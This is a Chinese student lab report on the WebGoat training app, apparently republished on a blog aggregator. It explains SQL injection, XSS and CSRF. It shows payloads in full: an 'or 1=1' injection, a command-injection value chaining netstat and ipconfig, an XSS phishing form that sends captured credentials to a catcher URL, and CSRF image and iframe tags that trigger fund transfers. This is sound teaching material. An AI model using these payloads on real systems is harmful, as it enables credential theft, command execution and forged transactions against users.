2018-2019-2 20165227《网络对抗技术》Exp9 Web安全基础
2018-2019-2 20165227《网络对抗技术》Exp9 Web安全基础
问题回答
一、SQL注入攻击原理,如何防护html
- 原理解释:经过在用户名、密码登输入框中输入特殊字符,在处理字符串与sql语句拼接过程当中实现引号闭合、注释部分SQL语句,利用永真式,从而达到登陆、显示信息等目的
- 防护措施:对于输入框的输入进行有效的限制,好比对输入的长度、非法字符等进行限制,能够抵御必定的攻击
二、XSS攻击的原理,如何防护git
- 原理解释:XSS是一种常常出如今web应用中的计算机安全漏洞,它容许恶意web用户将代码(如,HTML代码和客户端脚本)植入到提供给其它用户使用的页面中,攻击者能够利用XSS漏洞旁得到访问控制
- 防护措施:对于JSP的进行必定的特征收集,对于其内容严格验证并规定其格式
三、CSRF攻击原理,如何防护github
- 原理解释:CSRF跨站请求伪造,也被称为“oneclickattack”或者sessionriding,一般缩写为CSRF或者XSRF,是一种对网站的恶意利用,经过假装来自受信任用户的请求来利用受信任的网站。是一种依赖web浏览器的、被混淆过的代理人攻击
- 防护措施:在结束浏览器的会话后,对cookie进行清理
实验步骤:
准备
安装Webgoat(在网上找到并下载安装包 )
web浏览器登录
http://localhost:8080/WebGoat进入Webgoat,用下方的用户名及密码进行登录
sql登录成功界面
浏览器
实验一:SQL注入攻击
Numeric SQL Injection攻击
在复选框上右键,选择
inspect Element,对源代码进行修改,在源代码复选框内容第一排后添加or 1=1
安全成功
cookie
Log Spoofing攻击
- 在页面中的
User Name中填写20165227%0d%0aLogin Succeeded !admin - 成功
Command Injection攻击
在复选框上右键,选择
inspect Element,对源代码进行修改,在复选框的某一选项中加入"& netstat -an & ipconfig"
网络显示攻击后的结果
session
实验二:XSS攻击
Phishing with XSS攻击
- 在搜索框输入攻击代码
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
- 在下方的登录界面输入的用户名及密码就会被捕获并返回给你
Stored XSS Attacks攻击
- 在要发布的Massage部分插入JSP代码,当帖子被浏览时候,该代码会被浏览器解析成html的内容。
- 在其中输入
<script>alert("5228 is 5227's son");</script>
实验三:CSRF攻击
Cross Site Request Forgery攻击
- 写一个URL,让用户点击,从而触发攻击
- 以图片的形式将URL放入Massage框中,让用户错觉得接收到的是一张图,一旦点击,就会触发CSRF事件
- 内容为
<img src="http://localhost:8080/WebGoat/attack?Screen=276&menu=900&transferFunds=10000"/>
CSRF Prompt By-Pass攻击
- 在message框中输入代码
<iframe src="attack?Screen=324&menu=900&transferFunds=5000"> </iframe> <iframe src="attack?Screen=324&menu=900&transferFunds=CONFIRM"> </iframe>
- 结果
实验问题
在登录Webgoat的时候,界面显示有问题,找不到攻击的教程经过同窗的帮助才知道是JDK的版本不适配
经过同窗的帮助才知道是JDK的版本不适配,从新安装了JDK1.8
实验感想
- 此次的实验有对于SQL语句和网页HTML的要求,对于以后的考试内容也颇有帮助,也是一次颇有意思的实验
相关文章
- 1. 2018-2019-2 网络对抗技术 20165231 Exp9 Web安全基础
- 2. 20155219付颖卓 《网络对抗技术》 Exp9 Web安全基础
- 3. 2017-2018-2 20155224 『网络对抗技术』Exp9:Web安全基础
- 4. 2018-2019-2 20165212《网络对抗技术》Exp9 Web安全基础
- 5. 2017-2018-2 20155303『网络对抗技术』Exp9:Web安全基础
- 6. 2017-2018-2 《网络对抗技术》20155322 Exp9 web安全基础
- 7. 20164317《网络对抗技术》Exp9 Web安全基础
- 8. 2018-2019-2 20165219《网络对抗技术》Exp9 Web安全基础
- 9. 2018-2019-2 网络对抗技术 20165324 Exp9: Web安全基础
- 10. 2018-2019-2 20165330《网络对抗技术》Exp9 Web安全基础
- 更多相关文章...
- • 网站主机 技术 - 网站主机教程
- • XML 相关技术 - XML 教程
- • 三篇文章了解 TiDB 技术内幕——说存储
- • 三篇文章了解 TiDB 技术内幕 —— 谈调度
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 升级Gradle后报错Gradle‘s dependency cache may be corrupt (this sometimes occurs
- 2. Smarter, Not Harder
- 3. mac-2019-react-native 本地环境搭建(xcode-11.1和android studio3.5.2中Genymotion2.12.1 和VirtualBox-5.2.34 )
- 4. 查看文件中关键字前后几行的内容
- 5. XXE萌新进阶全攻略
- 6. Installation failed due to: ‘Connection refused: connect‘安卓studio端口占用
- 7. zabbix5.0通过agent监控winserve12
- 8. IT行业UI前景、潜力如何?
- 9. Mac Swig 3.0.12 安装
- 10. Windows上FreeRDP-WebConnect是一个开源HTML5代理,它提供对使用RDP的任何Windows服务器和工作站的Web访问
欢迎关注本站公众号,获取更多信息
相关文章
- 1. 2018-2019-2 网络对抗技术 20165231 Exp9 Web安全基础
- 2. 20155219付颖卓 《网络对抗技术》 Exp9 Web安全基础
- 3. 2017-2018-2 20155224 『网络对抗技术』Exp9:Web安全基础
- 4. 2018-2019-2 20165212《网络对抗技术》Exp9 Web安全基础
- 5. 2017-2018-2 20155303『网络对抗技术』Exp9:Web安全基础
- 6. 2017-2018-2 《网络对抗技术》20155322 Exp9 web安全基础
- 7. 20164317《网络对抗技术》Exp9 Web安全基础
- 8. 2018-2019-2 20165219《网络对抗技术》Exp9 Web安全基础
- 9. 2018-2019-2 网络对抗技术 20165324 Exp9: Web安全基础
- 10. 2018-2019-2 20165330《网络对抗技术》Exp9 Web安全基础